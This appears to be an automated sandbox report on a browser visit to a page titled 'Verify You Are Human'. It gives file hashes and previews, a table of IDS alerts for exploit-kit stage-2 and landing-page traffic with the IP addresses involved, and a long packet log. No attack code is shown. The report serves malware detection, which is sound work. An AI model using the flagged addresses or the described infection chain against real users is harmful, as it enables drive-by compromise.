                                                                                                                                                                                              Preview:wOF2......4L......k...3..............................Z..|.`..J.......W..Z..6.$..0. ..t. .0\%.mv...H...h$B.8.L.v..0Q....s..c.c..m[...:...rO........p.*(.~....:,...8l...:<........S....7m..3-...+~.9#...2..9....3\..EYm...........d2...@(L.1KbW#.....(+<...u...T..(l,.=U5Q.TL..S9z....S.E...0.J......&)..I...uD'.....'...P.%.....y5'....aae..q........{k'...G.....&&E.......)j.7S.zj......{.T.N*..<....^........6...U...8P-@.........c.~|.C.m../..~Zp._....m:..(....S3. .......H.m.c.....d..(.s.:....VU.wz....g.je.4;...4.A&...Y.yvMx..C..$.AzAvi~.qtA..<.........,..!.....HH&...D.z....).L..5..."...{.2G.Z.2G3.!....-B.....r.0'....!9...[........$H."......JuT....$.....*@...)..n..........C..".....";.A.E.Q.:.Q.=B....*............G."X......P(.p.Ij......8.......y.7...o'2..a......v|(............j[`.7.&mG.pY.....l8..Y.,...+[..f."7....WC............z..m..'%...;...\X...N....z.....?5.....o.r.g.......6.....n?.P.9....MV...U.g.y..+v4.yn.."...v...f:k...h7.E|Rw7..l.8..>=..0p..3.h.G.....G
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (5731), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):5731
                                                                                                                                                                                              Entropy (8bit):5.693625886449521
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:YyRkcgyDgUE7Zb1H7Zb1Tt7ZmZ7Zm87Zwtvfx7Zwcx7Zyi7ZyJ7Zi1M7Zi15OBnr:ynyDgUENbBNbbNmZNm8NwtvfxNwcxNyr
                                                                                                                                                                                              MD5:3E192268BB27E29928746C2D5F51E703
                                                                                                                                                                                              SHA1:43EABA55AD2864D34D027A60D2C2B9FBA3AF9657
                                                                                                                                                                                              SHA-256:45E78AE55FB6232F733DF0C9EE405DD3CD875D8A26AD39322B3481753F5B5133
                                                                                                                                                                                              SHA-512:C8EB811FE90A2EB3401DED1245EF0E84A73D749B0976F313DF4A102FCE99124B5146A935950E9808AC18A132020BD81D26B975FE3F0CFA05C7EE52D31358DCD1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/1070729751?random=1732134510409&cv=11&fst=1732134510409&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1
                                                                                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":10368000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1093817975.1732134501","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1093817975.1732134501\u0026ig_key=1sNHMxMDkzODE3OTc1LjE3MzIxMzQ1MDE!2sZ9x6cQ!3sAAptDV7i4XmJ\u0026tag_eid=44805651","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1smPxnzw!2sZ9x6cQ!3sAAptDV7i4XmJ","1i44805651"],"userBiddingSignals":[["8585685316","465297401","617757027","3385283","7988378954","3385403","8585686888"],null,1732134513725650],
                                                                                                                                                                                              No static file info
                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2024-11-20T21:28:27.532735+01002858001ETPRO EXPLOIT_KIT LandUpdate808 Stage 2 Request1192.168.2.54980545.61.136.196443TCP
                                                                                                                                                                                              2024-11-20T21:28:31.963906+01002858001ETPRO EXPLOIT_KIT LandUpdate808 Stage 2 Request1192.168.2.54984545.61.136.196443TCP
                                                                                                                                                                                              2024-11-20T21:28:41.119370+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54992534.111.113.62443TCP
                                                                                                                                                                                              2024-11-20T21:28:41.188297+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.549928104.18.26.193443TCP
                                                                                                                                                                                              2024-11-20T21:28:41.299946+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54992435.214.136.108443TCP
                                                                                                                                                                                              2024-11-20T21:28:49.907633+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54998634.96.127.16443TCP
                                                                                                                                                                                              2024-11-20T21:28:51.860202+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.55000034.96.127.16443TCP
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 20, 2024 21:27:56.964899063 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:27:56.964915037 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:27:57.105603933 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:28:06.574385881 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:28:06.574405909 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:28:06.714989901 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:28:09.154515982 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:09.154669046 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                              Nov 20, 2024 21:28:11.451456070 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:11.451509953 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:11.451570988 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452229977 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452316046 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452393055 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452547073 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452558994 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452949047 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:11.452990055 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.672369003 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.673407078 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.673469067 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.674583912 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.674669027 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.680064917 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.680161953 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.682034016 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.682066917 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.723026991 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.730561972 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.762507915 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.762537956 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.764189959 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.764295101 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.771241903 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.771343946 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.821885109 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:12.821913958 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:12.868963957 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236651897 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236712933 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236757040 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236787081 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236799955 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236821890 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.236850977 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.237065077 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.237133026 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.237152100 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.245001078 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.245119095 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.245121002 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.245151043 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.245217085 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.252552032 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.293066978 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.427540064 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.431376934 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.431438923 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.431449890 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.439457893 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.439548016 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.439563990 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.447408915 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.447484970 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.447499990 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.449843884 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.450524092 CET49715443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.450568914 CET44349715141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.450653076 CET49715443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.450953007 CET49715443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.450983047 CET44349715141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.452327967 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.452362061 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.452428102 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.452735901 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.452750921 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.455971003 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.456034899 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.456051111 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.456674099 CET49717443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.456705093 CET44349717141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.456826925 CET49717443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.457554102 CET49717443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.457581997 CET44349717141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.458106995 CET49718443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.458120108 CET44349718141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.458192110 CET49718443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.458477974 CET49718443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.458492041 CET44349718141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.463907003 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:13.463937044 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.463994980 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:13.464361906 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.464437962 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.464452982 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.468373060 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:13.468388081 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.471555948 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.471623898 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.471631050 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.479671955 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.479729891 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.479741096 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.491363049 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.495532036 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.495594025 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.495606899 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.503446102 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.503509045 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.503520012 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.519038916 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.519100904 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.519109964 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.547508955 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.547586918 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.547595978 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.590392113 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.590445995 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.590534925 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.590747118 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.590780020 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.603538990 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.603550911 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.608246088 CET49721443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:13.608285904 CET44349721104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.608362913 CET49721443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:13.608597040 CET49721443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:13.608611107 CET44349721104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.622170925 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.622231007 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.622240067 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.630383015 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.630451918 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.630470991 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.638360023 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.638442993 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.638461113 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.661571980 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.661592007 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.661648035 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.661667109 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.661699057 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.666384935 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.666455030 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.666472912 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.666532040 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.671120882 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.675821066 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.675910950 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.675929070 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.676014900 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.684082985 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.684102058 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.684156895 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.690666914 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.690742970 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.690779924 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.690843105 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.697274923 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.697297096 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.697362900 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.700871944 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.700961113 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.707328081 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.707410097 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.713932991 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.714046001 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.739635944 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.739722013 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.744574070 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.744673014 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.751193047 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.751271963 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792473078 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792617083 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792665005 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792685032 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792768002 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792813063 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792825937 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792941093 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792988062 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.792995930 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.804063082 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.804121971 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.804132938 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.813029051 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.813102961 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.819803953 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.819884062 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.826261044 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.826342106 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.832634926 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.832707882 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.835767031 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.835844040 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.841335058 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.841427088 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.844099998 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.844168901 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.849334002 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.849415064 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.854546070 CET49709443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.854569912 CET44349709141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.854778051 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.854851961 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.860250950 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.860333920 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.863097906 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.863178015 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.867686987 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.867757082 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.867785931 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.871494055 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.871573925 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.873420954 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.873492002 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.877139091 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.877199888 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.880950928 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.881026983 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.881057978 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.881130934 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.882950068 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.883018970 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.886658907 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.886732101 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.887603998 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.887751102 CET44349710141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:13.887814999 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.888787985 CET49710443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:13.888818026 CET44349710141.193.213.10192.168.2.5
